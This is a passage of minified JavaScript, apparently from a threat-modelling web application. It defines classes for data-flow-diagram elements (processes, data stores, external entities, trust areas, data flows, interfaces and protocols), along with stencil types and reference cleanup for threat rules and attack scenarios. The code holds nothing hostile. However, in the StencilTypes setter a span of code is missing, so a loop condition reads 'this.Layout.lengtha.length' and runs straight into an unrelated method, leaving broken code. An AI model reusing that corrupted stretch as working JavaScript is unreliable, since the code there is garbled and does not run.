this.SoftwareStack&&n.push({Type:li.DeleteStack,Param:this.SoftwareStack}),this.ProcessStack&&n.push({Type:li.DeleteStack,Param:this.ProcessStack}),this.AssetGroup&&n.push({Type:li.DeleteAssetGroup,Param:this.AssetGroup}),this.Checklists.forEach(r=>n.push({Type:li.DeleteChecklist,Param:r})),n}OnDelete(e,i){super.OnDelete(e,i),this.FindReferences(e,i).forEach(r=>{r.Type==li.DeleteDiagram?e.DeleteDiagram(r.Param):r.Type==li.DeleteStack?e.DeleteStack(r.Param):r.Type==li.DeleteAssetGroup?e.DeleteAssetGroup(r.Param):r.Type==li.DeleteChecklist&&e.DeleteChecklist(r.Param)})}initProperties(){super.initProperties(),this.AddProperty("properties.InterfaceTop","InterfaceTop","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceRight","InterfaceRight","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceBottom","InterfaceBottom","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceLeft","InterfaceLeft","",!0,Ii.DevInterfaceName,!0)}}return t.Icon="devices",t})();class xG extends os{constructor(a,e,i){super(a,Aa.ExternalEntity,e,i)}}class Ts extends os{get diagramID(){var a;return null===(a=this.project.FindDiagramOfElement(this.Ref.ID))||void 0===a?void 0:a.ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)))}static InstantiateRef(a,e,i){if(a instanceof sf)return Bg.InstantiateRef(a,e,i);let n=new Ts({},a.Type,e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class Bg extends sf{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i){super(a,e,i),this.project=e,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.OutOfScopeChanged.subscribe(a=>this.OutOfScopeChanged.emit(a)))}static InstantiateRef(a,e,i){let n=new Bg({},e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}var Et=(()=>{return(t=Et||(Et={}))[t.None=0]="None",t[t.LogProcessing=11]="LogProcessing",t[t.PhyProcessing=12]="PhyProcessing",t[t.LogDataStore=21]="LogDataStore",t[t.PhyDataStore=22]="PhyDataStore",t[t.LogExternalEntity=31]="LogExternalEntity",t[t.PhyExternalEntity=32]="PhyExternalEntity",t[t.DataFlow=41]="DataFlow",t[t.PhysicalLink=51]="PhysicalLink",t[t.Interface=61]="Interface",t[t.LogTrustArea=71]="LogTrustArea",t[t.PhyTrustArea=72]="PhyTrustArea",Et;var t})();class Sc{static Constructor(a){switch(a){case Et.LogTrustArea:return Up;case Et.PhyTrustArea:return Gg;case Et.LogProcessing:return Vp;case Et.PhyProcessing:return Hg;case Et.LogDataStore:return Bp;case Et.PhyDataStore:return Ug;case Et.LogExternalEntity:return Hp;case Et.PhyExternalEntity:return qg;case Et.DataFlow:return rs;case Et.PhysicalLink:return lf;case Et.Interface:return Nu;default:return console.error("Missing Element Type in ElementTypeUtil.Constructor()",a),null}}static GetPhyiscalID(a){switch(a){case Et.LogDataStore:return Et.PhyDataStore;case Et.LogProcessing:return Et.PhyProcessing;case Et.LogExternalEntity:return Et.PhyExternalEntity;case Et.LogTrustArea:return Et.PhyTrustArea;default:return null}}static GetTypes(){return[Et.LogProcessing,Et.PhyProcessing,Et.LogDataStore,Et.PhyDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogTrustArea,Et.PhyTrustArea,Et.DataFlow,Et.PhysicalLink,Et.Interface]}static Icon(a){switch(a){case Et.LogTrustArea:return Up.Icon;case Et.PhyTrustArea:return Gg.Icon;case Et.LogProcessing:return Vp.Icon;case Et.PhyProcessing:return Hg.Icon;case Et.LogDataStore:return Bp.Icon;case Et.PhyDataStore:return Ug.Icon;case Et.LogExternalEntity:return Hp.Icon;case Et.PhyExternalEntity:return qg.Icon;case Et.DataFlow:return rs.Icon;case Et.PhysicalLink:return lf.Icon;case Et.Interface:return Nu.Icon;default:return console.error("Missing Element Type in ElementTypeUtil.Icon()",a),null}}static IsPhysical(a){switch(a){case Et.None:case Et.LogTrustArea:return!1;case Et.PhyTrustArea:return!0;case Et.LogProcessing:return!1;case Et.PhyProcessing:return!0;case Et.LogDataStore:return!1;case Et.PhyDataStore:return!0;case Et.LogExternalEntity:return!1;case Et.PhyExternalEntity:return!0;case Et.DataFlow:return!1;case Et.PhysicalLink:case Et.Interface:return!0;default:return console.error("Missing Element Type in ElementTypeUtil.IsPhysical()",a),null}}static ToString(a){switch(a){case Et.LogTrustArea:return"Logical Trust Area";case Et.PhyTrustArea:return"Physical Trust Area";case Et.LogProcessing:return"Logical Process";case Et.PhyProcessing:return"Physical Processor";case Et.LogDataStore:return"Logical Data Store";case Et.PhyDataStore:return"Physical Data Store";case Et.LogExternalEntity:return"Logical External Entity";case Et.PhyExternalEntity:return"Physical External Entity";case Et.DataFlow:return"Data Flow";case Et.PhysicalLink:return"Physical Link";case Et.Interface:return"Interface";default:return console.error("Missing Element Type in ElementTypeUtil.ToString()",a),null}}}class oM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.IsDefault||(this.Data.IsDefault=!1),this.Properties||(this.Properties=[])}get ElementTypeID(){return this.Data.ElementTypeID}set ElementTypeID(a){this.Data.ElementTypeID=a}get IsDefault(){return this.Data.IsDefault}set IsDefault(a){this.Data.IsDefault=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}get PropertyOverwrites(){return this.Data.PropertyOverwrites}set PropertyOverwrites(a){this.Data.PropertyOverwrites=a}get TemplateDFD(){return this.config.GetStencilTypeTemplate(this.Data.templateDFDID)}set TemplateDFD(a){this.Data.templateDFDID=null==a?void 0:a.ID}FindReferences(a,e){let i=[];return null==a||a.GetDFDElements().filter(n=>n.GetProperty("Type").ID==this.ID).forEach(n=>i.push({Type:li.ResetStencilType,Param:n})),e.GetThreatRules().filter(n=>{var r;return n.RuleType==on.Stencil&&(null===(r=n.StencilRestriction)||void 0===r?void 0:r.stencilTypeID)==this.ID}).forEach(n=>i.push({Type:li.DeleteThreatRule,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.GetStencilTypes().find(r=>r.IsDefault&&r.ElementTypeID==this.ElementTypeID);i.forEach(r=>{r.Type==li.ResetStencilType?r.Param.SetProperty("Type",n):r.Type==li.DeleteThreatRule&&e.DeleteThreatRule(r.Param)})}static FromJSON(a,e){return new oM(a,e)}}class rM extends Ln{constructor(a,e){super(a),this.config=e,this.ListInHWDiagram||(this.ListInHWDiagram=!0),this.ListInElementTypeIDs||(this.ListInElementTypeIDs=[]),this.Layout||(this.Layout=[]),this.Data.stencilTypeIDs||(this.Data.stencilTypeIDs=[]),null==this.CanEditInWhichDiagram&&(this.CanEditInWhichDiagram=!0)}get CanEditInWhichDiagram(){return this.Data.CanEditInWhichDiagram}set CanEditInWhichDiagram(a){this.Data.CanEditInWhichDiagram=a}get ListInHWDiagram(){return this.Data.ListInHWDiagram}set ListInHWDiagram(a){this.Data.ListInHWDiagram=a}get ListInUCDiagram(){return this.Data.ListInUCDiagram}set ListInUCDiagram(a){this.Data.ListInUCDiagram=a}get ListInElementTypeIDs(){return this.Data.ListInElementTypeIDs}set ListInElementTypeIDs(a){this.Data.ListInElementTypeIDs=a}get StencilTypes(){return this.config.GetStencilTypes().filter(a=>this.Data.stencilTypeIDs.includes(a.ID))}set StencilTypes(a){for(this.Data.stencilTypeIDs=a.map(e=>e.ID);this.Layout.lengtha.length;)this.Layout.pop();for(let e=0;en.TemplateDFD==this).forEach(n=>{i.push({Type:li.RemoveStencilTypeTemplateFromStencilType,Param:this})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveStencilTypeTemplateFromStencilType&&(n.Param.TemplateDFD=null)})}static FromJSON(a,e){return new rM(a,e)}}class sM extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.Letters&&(this.Letters=[])}get Letters(){return this.Data.Letters}set Letters(a){this.Data.Letters=a}GetThreatCategory(a){return this.config.GetThreatCategory(a.threatCategoryID)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatRule)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(n.Param)})}static FromJSON(a,e){return new sM(a,e)}}class lc extends Np{constructor(a,e,i,n){var r;super(a),this.TypeChanged=new Tt,this.PhysicalElementChanged=new Tt,this.project=i,this.config=n,this.Type=e,0==(null===(r=this.Name)||void 0===r?void 0:r.length)&&(this.Name=i?Gi.FindUniqueName(e.Name,i.GetDFDElements().map(c=>c.Name)):null==e?void 0:e.Name),this.Data.IsPhyiscal||(this.Data.IsPhyiscal=Sc.IsPhysical(e.ElementTypeID)),!this.IsPhysical&&e.ElementTypeID!=Et.DataFlow&&this.AddProperty("properties.PhysicalElement","PhysicalElement","properties.PhysicalElement.tt",!0,Ii.PhysicalElementSelect,!0)}get Type(){return this.config.GetStencilType(this.Data.typeID)}set Type(a){if(this.setTypeProperties(a,this.Type),a)this.Data.typeID=a.ID;else{const e=this.config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==this.Data.ElementTypeID);this.Data.typeID=e?e.ID:null}this.TypeChanged.emit(a)}get Parent(){return this.project.GetDFDElement(this.Data.parentID)||null}set Parent(a){this.Parent&&this.Parent.ID!=a.ID&&this.Parent.RemoveChild(this),this.Data.parentID=a.ID}get IsPhysical(){return this.Data.IsPhyiscal}get PhysicalElement(){return this.project.GetDFDElement(this.Data.physicalElementID)}set PhysicalElement(a){this.Data.physicalElementID=null==a?void 0:a.ID,this.PhysicalElementChanged.emit(a)}FindReferences(a,e){let i=super.FindReferences(a,e);return null==a||a.GetDFDElementRefs().filter(n=>n.Ref.ID==this.ID).forEach(n=>i.push({Type:li.DeleteElementReferences,Param:n})),this instanceof Ys&&i.push({Type:li.MoveChildElements,Param:this.Parent}),this.IsPhysical&&(null==a||a.GetDFDElements().filter(n=>{var r;return(null===(r=n.PhysicalElement)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>i.push({Type:li.RemovePhysicalElementReference,Param:n}))),null==a||a.GetDFDElements().filter(n=>{var r,c;return n instanceof rs&&[null===(r=n.Sender)||void 0===r?void 0:r.ID,null===(c=n.Receiver)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.DeleteDataFlow,Param:n})),this instanceof Nu&&(null==a||a.GetDFDElements().filter(n=>{var r,c;return n instanceof rs&&[null===(r=n.SenderInterface)||void 0===r?void 0:r.ID,null===(c=n.ReceiverInterface)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.RemoveInterfaceReference,Param:n}))),i}OnDelete(a,e){super.OnDelete(a,e),null!=this.Parent&&this.Parent.RemoveChild(this),this.FindReferences(a,e).forEach(n=>{var r,c;if(n.Type==li.DeleteElementReferences)a.DeleteDDFElement(n.Param);else if(n.Type==li.MoveChildElements&&this instanceof Ys)this.GetChildren().forEach(d=>this.Parent.AddChild(d));else if(n.Type==li.RemovePhysicalElementReference)n.Param.PhysicalElement=null;else if(n.Type==li.RemoveInterfaceReference){let d=n.Param;(null===(r=d.SenderInterface)||void 0===r?void 0:r.ID)==this.ID&&(d.SenderInterface=null),(null===(c=d.ReceiverInterface)||void 0===c?void 0:c.ID)==this.ID&&(d.ReceiverInterface=null)}else n.Type==li.DeleteDataFlow?a.DeleteDDFElement(n.Param):n.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(n.Param)})}static Instantiate(a,e,i){return new(Sc.Constructor(a.ElementTypeID))({},a,e,i)}static FromJSON(a,e,i){let n,r=i.GetStencilType(a.typeID);if(a.refID)n=e.GetDFDElement(a.refID)instanceof Ys?new zm(a,r,e,i):new td(a,r,e,i);else if(a.ElementTypeID==Et.LogTrustArea)n=new Up(a,r,e,i);else if(a.ElementTypeID==Et.PhyTrustArea)n=new Gg(a,r,e,i);else if(a.ElementTypeID==Et.LogProcessing)n=new Vp(a,r,e,i);else if(a.ElementTypeID==Et.PhyProcessing)n=new Hg(a,r,e,i);else if(a.ElementTypeID==Et.LogDataStore)n=new Bp(a,r,e,i);else if(a.ElementTypeID==Et.PhyDataStore)n=new Ug(a,r,e,i);else if(a.ElementTypeID==Et.LogExternalEntity)n=new Hp(a,r,e,i);else if(a.ElementTypeID==Et.PhyExternalEntity)n=new qg(a,r,e,i);else if(a.ElementTypeID==Et.DataFlow)n=new rs(a,r,e,i);else if(a.ElementTypeID==Et.PhysicalLink)n=new lf(a,r,e,i);else if(a.ElementTypeID==Et.Interface)n=new Nu(a,r,e,i);else{if(a.ElementTypeID!=Et.None)throw new Error("Unknown ElementTypeID: "+a.ElementTypeID);n=new Ys(a,r,e,i)}return n}initProperties(){super.initProperties(),this.AddProperty("properties.Type","Type","",!0,Ii.StencilType,!0)}setTypeProperties(a,e){let i=null;if(a&&(i=this.config.GetStencilElementType(a),!a.IsDefault&&i&&i.Properties&&i.Properties.forEach(n=>{var r;this.AddProperty(null==n.DisplayName?n.ID:n.DisplayName,n.ID,n.Tooltip,!1,n.Type,n.Editable);let c=null===(r=a.PropertyOverwrites)||void 0===r?void 0:r.find(d=>d.Key==n.ID);c?n.HasGetter?this[n.ID]=c.Value:this.Data[n.ID]=c.Value:n.HasGetter&&null==this[n.ID]?this[n.ID]=n.DefaultValue:!n.HasGetter&&null==this.Data[n.ID]&&(this.Data[n.ID]=n.DefaultValue)}),a.Properties&&a.Properties.forEach(n=>{this.AddProperty(null==n.DisplayName?n.ID:n.DisplayName,n.ID,n.Tooltip,n.HasGetter,n.Type,n.Editable);try{n.HasGetter&&null==this[n.ID]?this[n.ID]=n.DefaultValue:null==this.Data[n.ID]&&(this.Data[n.ID]=n.DefaultValue)}catch(r){}})),e&&e.Properties&&a.Properties){let n=a.Properties.map(r=>r.ID);i&&n.push(...i.Properties.map(r=>r.ID)),e.Properties.filter(r=>!n.includes(r.ID)).forEach(r=>{delete this.Data[r.ID]})}}}class td extends lc{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.project=i,this.config=n,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:"OutOfScope"==a?this.OutOfScope:this.Ref.GetProperty(a)}SetProperty(a,e){"OutOfScope"==a?this.OutOfScope=e:this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.TypeChanged.subscribe(a=>this.TypeChanged.emit(a)),this.Ref.OutOfScopeChanged.subscribe(a=>this.OutOfScopeChanged.emit(a)))}static InstantiateRef(a,e,i){if(a instanceof Ys)return zm.InstantiateRef(a,e,i);let n=new td({},a.Type,e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class v2 extends lc{get ProcessedData(){var a;let e=[];return null===(a=this.Data.ProcessedDataIDs)||void 0===a||a.forEach(i=>e.push(this.project.GetMyData(i))),e}set ProcessedData(a){this.Data.ProcessedDataIDs=null==a?void 0:a.map(e=>e.ID),a&&a.length>0&&(this.ProcessedDataSensitivity=Math.max(...a.map(e=>e.Sensitivity)))}get ProcessedDataSensitivity(){return this.Data.ProcessedDataSensitivity}set ProcessedDataSensitivity(a){this.Data.ProcessedDataSensitivity=a}constructor(a,e,i,n){super(a,e,i,n),this.Data.ProcessedDataIDs||(this.Data.ProcessedDataIDs=[])}initProperties(){super.initProperties(),this.AddProperty("properties.ProcessedData","ProcessedData","properties.ProcessedData.tt",!0,Ii.MyDataSelect,!0),this.AddProperty("properties.ProcessedDataSensitivity","ProcessedDataSensitivity","properties.ProcessedDataSensitivity.tt",!0,Ii.LowMediumHighSelect,!0,dr.Medium)}}let wG=(()=>{class t extends v2{}return t.Icon="memory",t})();class Vp extends wG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogProcessing}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Vp.ElementTypeID);return e||(e=a.CreateStencilType(Vp.ElementTypeID),e.Name="Process",e.IsDefault=!0),e}}Vp.ElementTypeID=Et.LogProcessing;class Hg extends wG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyProcessing}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Hg.ElementTypeID);return e||(e=a.CreateStencilType(Hg.ElementTypeID),e.Name="Processor",e.IsDefault=!0),e}}Hg.ElementTypeID=Et.PhyProcessing;let IG=(()=>{class t extends v2{}return t.Icon="sd_card",t})();class Bp extends IG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogDataStore}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Bp.ElementTypeID);return e||(e=a.CreateStencilType(Bp.ElementTypeID),e.Name="Data Store",e.IsDefault=!0),e}}Bp.ElementTypeID=Et.LogDataStore;class Ug extends IG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyDataStore}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Ug.ElementTypeID);return e||(e=a.CreateStencilType(Ug.ElementTypeID),e.Name="Phy Data Store",e.IsDefault=!0),e}}Ug.ElementTypeID=Et.PhyDataStore;let RG=(()=>{class t extends v2{}return t.Icon="cloud",t})();class Hp extends RG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogExternalEntity}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Hp.ElementTypeID);return e||(e=a.CreateStencilType(Hp.ElementTypeID),e.Name="Ext. Entity",e.IsDefault=!0),e}}Hp.ElementTypeID=Et.LogExternalEntity;class qg extends RG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyExternalEntity}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==qg.ElementTypeID);return e||(e=a.CreateStencilType(qg.ElementTypeID),e.Name="Phy Ext. Entity",e.IsDefault=!0),e}}qg.ElementTypeID=Et.PhyExternalEntity;class lf extends v2{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhysicalLink}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==lf.ElementTypeID);return e||(e=a.CreateStencilType(lf.ElementTypeID),e.Name="Physical Link",e.IsDefault=!0),e}}lf.Icon="precision_manufacturing",lf.ElementTypeID=Et.PhysicalLink;class Nu extends v2{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.Interface}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Nu.ElementTypeID);return e||(e=a.CreateStencilType(Nu.ElementTypeID),e.Name="Interface",e.IsDefault=!0),e}}Nu.Icon="sync_alt",Nu.ElementTypeID=Et.Interface;class Lu extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.IsDefault&&(this.Data.IsDefault=!1),this.Properties||(this.Properties=[])}static GetDefaultType(a){let e=a.GetProtocols().find(i=>i.IsDefault);return e||(e=a.CreateProtocol(),e.Name="Protocol",e.IsDefault=!0),e}get IsDefault(){return this.Data.IsDefault}set IsDefault(a){this.Data.IsDefault=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}get PropertyOverwrites(){return this.Data.PropertyOverwrites}set PropertyOverwrites(a){this.Data.PropertyOverwrites=a}GetProperty(a){var e;let i=this.Properties.find(n=>n.ID==a);if(!i&&!this.IsDefault&&(i=Lu.GetDefaultType(this.config).Properties.find(n=>n.ID==a)),i){if(!this.IsDefault){let n=null===(e=this.PropertyOverwrites)||void 0===e?void 0:e.find(r=>r.Key==a);if(n)return n.Value}return i.DefaultValue}return super.GetProperty(a)}SetProperty(a,e){console.log("Protocol set property"),super.SetProperty(a,e)}FindReferences(a,e){let i=[];return e.GetStencilTypes().filter(n=>n.ElementTypeID==Et.DataFlow).forEach(n=>{var r;let c=null===(r=n.PropertyOverwrites)||void 0===r?void 0:r.find(d=>"ProtocolStack"==d.Key);c&&c.Value.includes(this.ID)&&i.push({Type:li.RemoveFromStencilProtocolStack,Param:n})}),null==a||a.GetDFDElements().filter(n=>n.Type.ElementTypeID==Et.DataFlow).filter(n=>n.ProtocolStack.includes(this)).forEach(n=>{i.push({Type:li.RemoveFromElementProtocolStack,Param:n})}),i}OnDelete(a,e){return this.FindReferences(a,e).forEach(n=>{if(n.Type==li.RemoveFromStencilProtocolStack){let r=n.Param.PropertyOverwrites.find(c=>c.Key==this.ID);n.Param.PropertyOverwrites.splice(n.Param.PropertyOverwrites.indexOf(r),1)}else n.Type==li.RemoveFromElementProtocolStack&&n.Param.ProtocolStack.splice(n.Param.ProtocolStack.indexOf(this),1)}),!0}static FromJSON(a,e){return new Lu(a,e)}}class rs extends lc{constructor(a,e,i,n){super(a,e,i,n),this.protocolProperties=[],this.LineTypeChanged=new Tt,this.ArrowPosChanged=new Tt,this.BendFlowChanged=new Tt,this.DirectionChanged=new Tt,this.AnchorChanged=new Tt,this.Data.ElementTypeID=Et.DataFlow,this.Data.protocolStackIDs||(this.Data.protocolStackIDs=[]),null==this.OverwriteProtocolProperties&&(this.OverwriteProtocolProperties=!1),this.Data.ProcessedDataIDs||(this.Data.ProcessedDataIDs=[]),this.OverwriteDataProperties=null!=this.Data.OverwriteDataProperties&&this.OverwriteDataProperties,null==this.Data.ShowName&&(this.ShowName=!0),null==this.Data.ShowProtocolDetails&&(this.ShowProtocolDetails=!0),null==this.Data.LineType&&(this.LineType=ed.Solid),null==this.Data.ArrowPos&&(this.ArrowPos=wn.End),Lu.GetDefaultType(this.config).Properties.forEach(r=>{let c=this.AddProperty(r.DisplayName,r.ID,r.Tooltip,r.HasGetter,r.Type,!1,r.DefaultValue);this.protocolProperties.push(r.ID),c.Editable=this.OverwriteProtocolProperties})}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==rs.ElementTypeID);return e||(e=a.CreateStencilType(rs.ElementTypeID),e.Name="Data Flow",e.IsDefault=!0,e.AddProperty("Overwrite Data","OverwriteDataProperties","By default, processed data and data sensitivity are referenced from sender. Overwrite to set them manually",!0,Ii.CheckBox,!0),e.AddProperty("Processed Data","ProcessedData","Data that the element processes, stores, produces, or receives",!0,Ii.MyDataSelect,!0),e.AddProperty("Data Sensitivity","ProcessedDataSensitivity","Sensitivity of the processed data",!0,Ii.LowMediumHighSelect,!0,dr.Medium),e.AddProperty("Overwrite Stack","OverwriteProtocolProperties","Use either the properties derived from the protocols or define them manually",!0,Ii.CheckBox,!0),e.AddProperty("Protocol Stack","ProtocolStack","List of protocols used within the communication",!0,Ii.ProtocolSelect,!0)),e}get Sender(){return this.project.GetDFDElement(this.Data.senderID)}set Sender(a){this.Data.senderID=a.ID}get Receiver(){return this.project.GetDFDElement(this.Data.receiverID)}set Receiver(a){this.Data.receiverID=null==a?void 0:a.ID}get SenderInterface(){return this.project.GetDFDElement(this.Data.senderInterfaceID)}set SenderInterface(a){this.Data.senderInterfaceID=null==a?void 0:a.ID,this.NameChanged.emit(this.GetProperty("Name"))}get ReceiverInterface(){return this.project.GetDFDElement(this.Data.receiverInterfaceID)}set ReceiverInterface(a){this.Data.receiverInterfaceID=null==a?void 0:a.ID,this.NameChanged.emit(this.GetProperty("Name"))}get OverwriteProtocolProperties(){return this.Data.OverwriteProtocolProperties}set OverwriteProtocolProperties(a){var e;this.Data.OverwriteProtocolProperties=a,null===(e=this.protocolProperties)||void 0===e||e.forEach(i=>{this.GetProperties().find(n=>i==n.ID).Editable=a})}get ProtocolStack(){let a=[];return this.Data.protocolStackIDs.forEach(e=>a.push(this.config.GetProtocol(e))),a}set ProtocolStack(a){this.Data.protocolStackIDs=null==a?void 0:a.map(e=>null!=e&&e.ID?e.ID:e),this.NameChanged.emit(this.GetProperty("Name"))}get ProcessedData(){var a;if(this.OverwriteDataProperties){let e=[];return this.Data.ProcessedDataIDs.forEach(i=>e.push(this.project.GetMyData(i))),e}return null===(a=this.Sender)||void 0===a?void 0:a.GetProperty("ProcessedData")}set ProcessedData(a){this.Data.ProcessedDataIDs=null==a?void 0:a.map(e=>e.ID),a&&a.length>0&&(this.ProcessedDataSensitivity=Math.max(...a.map(e=>e.Sensitivity)))}get ProcessedDataSensitivity(){var a;return this.OverwriteDataProperties?this.Data.ProcessedDataSensitivity:null===(a=this.Sender)||void 0===a?void 0:a.ProcessedDataSensitivity}set ProcessedDataSensitivity(a){this.Data.ProcessedDataSensitivity=a}get OverwriteDataProperties(){return this.Data.OverwriteDataProperties}set OverwriteDataProperties(a){this.Data.OverwriteDataProperties=a;const e=this.GetProperties().find(n=>"ProcessedData"==n.ID);e&&(e.Editable=a);const i=this.GetProperties().find(n=>"ProcessedDataSensitivity"==n.ID);i&&(i.Editable=a)}get FlowType(){return this.Data.FlowType}set FlowType(a){this.Data.FlowType=Number(a),(a==Xs.Extend||a==Xs.Include)&&(this.ShowName=!0,this.LineType=ed.Dashed,this.ArrowPos=a==Xs.Extend?wn.Start:wn.End),this.NameChanged.emit(this.Name)}get ShowName(){return this.Data.ShowName}set ShowName(a){this.Data.ShowName=a,this.NameChanged.emit(this.GetProperty("Name"))}get ShowProtocolDetails(){return this.Data.ShowProtocolDetails}set ShowProtocolDetails(a){this.Data.ShowProtocolDetails=a,this.NameChanged.emit(this.GetProperty("Name"))}get BendFlow(){return this.Data.BendFlow}set BendFlow(a){this.Data.BendFlow=a,this.BendFlowChanged.emit(a)}get LineType(){return this.Data.LineType}set LineType(a){this.Data.LineType=Number(a),this.LineTypeChanged.emit(a)}get ArrowPos(){return this.Data.ArrowPos}set ArrowPos(a){this.Data.ArrowPos=Number(a),this.ArrowPosChanged.emit(a)}ChangeDirection(){let a=this.Sender;this.Sender=this.Receiver,this.Receiver=a,a=this.SenderInterface,this.SenderInterface=this.ReceiverInterface,this.ReceiverInterface=a,this.DirectionChanged.emit()}GetProperty(a){var e;return!this.OverwriteProtocolProperties&&(null===(e=this.protocolProperties)||void 0===e?void 0:e.includes(a))?this.ProtocolStack.some(i=>i.GetProperty(a)):super.GetProperty(a)}SetProperty(a,e){super.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.Sender","Sender","",!0,Ii.ElementName,!0),this.AddProperty("properties.SenderInterface","SenderInterface","",!0,Ii.InterfaceElementSelect,!0),this.AddProperty("properties.Receiver","Receiver","",!0,Ii.ElementName,!0),this.AddProperty("properties.ReceiverInterface","ReceiverInterface","",!0,Ii.InterfaceElementSelect,!0),this.AddProperty("properties.Direction","","",!1,Ii.DataFlowChangeDirection,!0),this.AddProperty("properties.ShowName","ShowName","",!0,Ii.CheckBox,!0),this.AddProperty("properties.ShowProtocolDetails","ShowProtocolDetails","",!0,Ii.CheckBox,!0),this.AddProperty("properties.BendFlow","BendFlow","",!0,Ii.CheckBox,!0),this.AddProperty("properties.ArrowPos","ArrowPos","",!0,Ii.ArrowPosition,!0)}}rs.Icon="timeline",rs.ElementTypeID=Et.DataFlow;class Ys extends lc{constructor(a,e,i,n){super(a,e,i,n),this.ChildrenChanged=new Tt,this.Data.childrenIDs||(this.Data.childrenIDs=[]),this.Data.ElementTypeID=Et.None}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Ys.ElementTypeID);return e||(e=a.CreateStencilType(Ys.ElementTypeID),e.Name="DFD Container",e.IsDefault=!0),e}get 